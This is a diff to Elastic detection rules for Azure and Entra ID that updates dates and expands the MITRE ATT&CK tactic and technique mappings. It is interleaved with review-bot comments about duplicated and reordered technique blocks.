"https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_azure_service_principal_signin_multiple_countries.toml b/rules/integrations/azure/initial_access_azure_service_principal_signin_multiple_countries.toml index c844468a7a5..afd959b1ce0 100644 --- a/rules/integrations/azure/initial_access_azure_service_principal_signin_multiple_countries.toml +++ b/rules/integrations/azure/initial_access_azure_service_principal_signin_multiple_countries.toml 
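Review bot: `initial_access_azure_arc_cluster_credential_access_unusual_source.toml` now carries the `T1078` / `T1078.004` block twice, verbatim, once under Initial Access and once under the new Defense Evasion entry, and nothing in the diff explains the convention. Valid Accounts legitimately contributes to both tactics, so this is correct ATT&CK usage, but a reader comparing the two copies will suspect a paste error; a line in the commit description along the lines of "each tactic a technique contributes to gets its own `[[rule.threat]]` entry, so a technique may repeat" would settle it. The same duplication is applied in the `service_principal_signin_multiple_countries`, `device_code_auth_with_broker_client`, `protection_alerts_for_user` and `protection_confirmed_compromise` hunks, the last two with three copies.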
@@ -2,7 +2,7 @@ creation_date = "2026/03/10" integration = ["azure"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -125,22 +125,39 @@ FROM logs-azure.signinlogs-* metadata _id, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "azure.signinlogs.properties.service_principal_id", diff --git a/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml b/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml index 1ef19b65dbd..117f4401963 100644 --- a/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml +++ b/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["azure"] maturity = "production" -updated_date = "2025/12/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -106,31 +106,49 @@ from logs-azure.auditlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml b/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml index 9ea2a42f57b..83c4a5b1447 100644 --- a/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml +++ b/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/24" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -83,35 +83,50 @@ Entra ID Device Code Authentication allows users to authenticate devices using a [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" @@ -121,4 +136,3 @@ reference = "https://attack.mitre.org/techniques/T1550/001/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml b/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml index 09ce8630b50..4425f39fcce 100644 --- a/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml 
+++ b/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/31" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,26 +78,36 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Invite externa [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" + +[[rule.threat.technique.subtechnique]] +id = "T1136.003" +name = "Cloud Account" +reference = "https://attack.mitre.org/techniques/T1136/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml b/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml index 61dc6a1a52f..4ec0e262a58 100644 --- a/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml +++ b/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/09" integration = ["azure"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -108,17 +108,17 @@ event.dataset: "azure.signinlogs" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" @@ -126,22 +126,39 @@ reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "azure.signinlogs.properties.service_principal_name", diff --git a/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml b/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml index 6ff9e5edd71..43a2a424aa0 100644 --- a/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml +++ b/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/10/14" integration = ["azure"] maturity = "production" -updated_date = "2026/02/26" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Matteo Potito Giorgio"] @@ -107,30 +107,44 @@ event.dataset:(azure.activitylogs or azure.signinlogs) [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [rule.new_terms] field = "new_terms_fields" value = ["azure.signinlogs.properties.user_principal_name"] diff --git a/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml b/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml index 67c5edccbc2..cd73e02ab6e 100644 
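Review bot: In `initial_access_entra_id_first_time_seen_device_code_auth.toml` the `T1566` / `T1566.002` block is removed from before `T1078` and re-added after `T1078.004`, which changes nothing semantically but costs eight removed and nine added lines of churn in the Initial Access entry. If a formatter now orders techniques by id, say so in the description so reviewers can skip the move; if it is a manual edit, dropping the reorder keeps the hunk to the genuinely new Credential Access / `T1528` entry. The `[rule.new_terms]` context that follows the new block suggests there may be no separator after `reference = "https://attack.mitre.org/tactics/TA0006/"`, though blank context lines cannot be recovered from this rendering, so confirm against the file.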
--- a/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml +++ b/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/08" integration = ["azure"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -190,36 +190,41 @@ from logs-azure.signinlogs-*, logs-azure.graphactivitylogs-* metadata _id, _vers [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1550.004" +name = "Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1550/004/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml b/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml index fd3737f9131..dd13f3c1aa0 100644 --- a/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml 
+++ b/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,34 +91,47 @@ event.dataset: "azure.auditlogs" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml b/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml index 84bf8f56d93..7e5c8cc7b8f 100644 --- a/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml +++ b/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/12/17" integration = ["azure"] maturity = "production" -updated_date = "2026/01/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -139,44 +139,62 @@ event.dataset: "azure.signinlogs" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", 
diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml index d8d3ad94d2c..b8869e67cbe 100644 --- a/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml +++ b/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/23" integration = ["azure"] maturity = "production" -updated_date = "2026/01/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -139,41 +139,59 @@ event.outcome: "success" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/initial_access_entra_id_protection_alerts_for_user.toml b/rules/integrations/azure/initial_access_entra_id_protection_alerts_for_user.toml index c3b919b802c..6913e3e883a 100644 --- a/rules/integrations/azure/initial_access_entra_id_protection_alerts_for_user.toml +++ b/rules/integrations/azure/initial_access_entra_id_protection_alerts_for_user.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,19 +80,54 @@ sequence by azure.identityprotection.properties.user_principal_name with maxspan [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/azure/initial_access_entra_id_protection_confirmed_compromise.toml b/rules/integrations/azure/initial_access_entra_id_protection_confirmed_compromise.toml index fdff812e200..2fd952ddac8 100644 --- a/rules/integrations/azure/initial_access_entra_id_protection_confirmed_compromise.toml +++ b/rules/integrations/azure/initial_access_entra_id_protection_confirmed_compromise.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/10/06" integration = ["azure"] maturity = "production" -updated_date = "2025/10/06" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -107,22 +107,57 @@ event.dataset: azure.identity_protection and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml b/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml index da8c29614c4..d0ac2d950ae 100644 --- a/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml 
+++ b/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/10" integration = ["azure"] maturity = "production" -updated_date = "2025/12/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -123,34 +123,52 @@ event.dataset: "azure.signinlogs" and event.category: "authentication" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "azure.signinlogs.properties.user_principal_name", diff --git a/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml b/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml index 6ec4110788e..cb949f7b855 100644 
--- a/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml +++ b/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/10" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -94,17 +94,17 @@ event.dataset: "azure.signinlogs" and event.category: "authentication" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" 
@@ -112,34 +112,44 @@ reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" + [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" reference = "https://attack.mitre.org/techniques/T1110/003/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.new_terms] field = "new_terms_fields" value = [ diff --git a/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml b/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml index a80ea2d7227..74b30ff9e01 100644 --- a/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml +++ b/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -193,10 +193,12 @@ from logs-azure.signinlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" @@ -206,27 +208,44 @@ reference = "https://attack.mitre.org/techniques/T1078/004/" id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/initial_access_entra_id_unusual_ropc_login_attempt.toml b/rules/integrations/azure/initial_access_entra_id_unusual_ropc_login_attempt.toml index 99d562c6880..c44ae464c92 100644 --- a/rules/integrations/azure/initial_access_entra_id_unusual_ropc_login_attempt.toml +++ b/rules/integrations/azure/initial_access_entra_id_unusual_ropc_login_attempt.toml 
